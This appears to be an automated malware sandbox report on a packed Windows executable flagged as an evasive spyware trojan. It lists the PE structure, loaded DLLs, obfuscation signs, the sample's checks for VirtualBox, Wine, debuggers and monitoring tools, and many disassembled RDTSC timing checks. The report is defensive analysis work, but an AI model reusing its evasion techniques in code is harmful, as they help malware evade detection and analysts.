Source: mBr65h6L4w.exe Static PE information: Section: jbmcqnop ZLIB complexity 0.994540582337884
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 1_2_0099255D
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 1_2_009929FF
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: mBr65h6L4w.exe ReversingLabs: Detection: 34%
Source: mBr65h6L4w.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: mBr65h6L4w.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: mBr65h6L4w.exe Static file information: File size 4472320 > 1048576
Source: mBr65h6L4w.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: mBr65h6L4w.exe Static PE information: Raw size of jbmcqnop is bigger than: 0x100000 < 0x1b7800

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Unpacked PE file: 1.2.mBr65h6L4w.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jbmcqnop:EW;sxtwdxzr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jbmcqnop:EW;sxtwdxzr:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: mBr65h6L4w.exe Static PE information: real checksum: 0x446ba9 should be: 0x449cb0
PE file contains sections with non-standard names
Source: mBr65h6L4w.exe Static PE information: section name:
Source: mBr65h6L4w.exe Static PE information: section name: .idata
Source: mBr65h6L4w.exe Static PE information: section name:
Source: mBr65h6L4w.exe Static PE information: section name: jbmcqnop
Source: mBr65h6L4w.exe Static PE information: section name: sxtwdxzr
Source: mBr65h6L4w.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CB55CF push ebp; retf 1_3_01CB55D6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBEDCD pushfd ; retf 1_3_01CBEDCE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBEDCD pushfd ; retf 1_3_01CBEDCE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CB55DD push ebp; retf 1_3_01CB55EE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC25ED pushfd ; retf 1_3_01CC25EE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC25ED pushfd ; retf 1_3_01CC25EE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC25ED pushfd ; retf 1_3_01CC25EE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CB51F9 push edx; retf 1_3_01CB51FE
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBEDB8 pushfd ; retf 1_3_01CBEDBA
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBEDB8 pushfd ; retf 1_3_01CBEDBA
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC29B0 pushfd ; retf 1_3_01CC29C6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC29B0 pushfd ; retf 1_3_01CC29C6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC29B0 pushfd ; retf 1_3_01CC29C6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC95B3 push edx; retf 0001h 1_3_01CC95B6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC95B3 push edx; retf 0001h 1_3_01CC95B6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC95B3 push edx; retf 0001h 1_3_01CC95B6
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC954A push ebx; retf 0001h 1_3_01CC9556
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC954A push ebx; retf 0001h 1_3_01CC9556
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC954A push ebx; retf 0001h 1_3_01CC9556
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D58 pushfd ; retf 0004h 1_3_01CC4D0A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D58 pushfd ; retf 0004h 1_3_01CC4D0A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D58 pushfd ; retf 0004h 1_3_01CC4D0A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBF955 pushfd ; retf 1_3_01CBF956
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBF955 pushfd ; retf 1_3_01CBF956
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CBF955 pushfd ; retf 1_3_01CBF956
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D0D pushfd ; retf 0004h 1_3_01CC4D0A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D0D pushfd ; retn 0004h 1_3_01CC4D4A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D0D pushfd ; retf 0004h 1_3_01CC4D0A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D0D pushfd ; retn 0004h 1_3_01CC4D4A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D0D pushfd ; retf 0004h 1_3_01CC4D0A
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4D0D pushfd ; retn 0004h 1_3_01CC4D4A
Source: mBr65h6L4w.exe Static PE information: section name: jbmcqnop entropy: 7.955312856107021

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Window searched: window name: Regmonclass Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: mBr65h6L4w.exe, 00000001.00000003.2211257540.0000000007930000.00000004.00001000.00020000.00000000.sdmp, mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11E9688 second address: 11E968E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11E9954 second address: 11E9958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11E9C4A second address: 11E9C5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C1CD203FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11E9C5C second address: 11E9C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11EBE45 second address: 11EBE4B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11EBE4B second address: 11EBE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11EBE51 second address: 11EBE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11EBFBA second address: 11EBFF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jp 00007F8C1CD63238h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007F8C1CD6323Dh 0x0000001b pushad 0x0000001c jc 00007F8C1CD63236h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11EC152 second address: 11EC19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 jmp 00007F8C1CD20408h 0x0000000c push 00000003h 0x0000000e mov di, cx 0x00000011 push 00000000h 0x00000013 call 00007F8C1CD203FDh 0x00000018 pop edx 0x00000019 push 00000003h 0x0000001b jc 00007F8C1CD203F8h 0x00000021 push 6C2E43D7h 0x00000026 pushad 0x00000027 jnl 00007F8C1CD203FCh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11EC2F8 second address: 11EC2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11DA207 second address: 11DA20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11DA20D second address: 11DA212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11DA212 second address: 11DA217 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120A9B6 second address: 120A9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F8C1CD63242h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120A9D1 second address: 120A9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD20407h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AB8A second address: 120AB9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE19 second address: 120AE35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8C1CD20404h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE35 second address: 120AE3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE3B second address: 120AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE3F second address: 120AE64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C1CD63249h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE64 second address: 120AE6E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C1CD203F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE6E second address: 120AE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120AE74 second address: 120AE7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8C1CD203F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B3A1 second address: 120B3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F8C1CD6323Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B4F8 second address: 120B53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8C1CD20406h 0x0000000a jmp 00007F8C1CD203FFh 0x0000000f pushad 0x00000010 jmp 00007F8C1CD20407h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B53E second address: 120B559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 js 00007F8C1CD6323Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B6C5 second address: 120B6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B6C9 second address: 120B6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C1CD63246h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B6E5 second address: 120B6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD20405h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120B6FE second address: 120B702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120BA14 second address: 120BA1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120BA1A second address: 120BA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F8C1CD63236h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120BA28 second address: 120BA2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C0D2 second address: 120C0D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C233 second address: 120C238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C238 second address: 120C251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C251 second address: 120C255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C255 second address: 120C25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C396 second address: 120C3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD203FDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C520 second address: 120C524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C7D8 second address: 120C7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C7DC second address: 120C7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C7E0 second address: 120C7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8C1CD203F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C7EC second address: 120C809 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C1CD6324Fh 0x00000008 jmp 00007F8C1CD63243h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C809 second address: 120C811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 120C811 second address: 120C817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11D36C8 second address: 11D36CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11D36CC second address: 11D36D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121415E second address: 1214185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c jo 00007F8C1CD203FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12188A1 second address: 12188A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12188A5 second address: 12188A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12188A9 second address: 12188D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD63241h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 je 00007F8C1CD6324Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F8C1CD63236h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12188D3 second address: 12188D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11E44F6 second address: 11E4512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8C1CD63243h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11E4512 second address: 11E4523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD203FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1217D6F second address: 1217D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
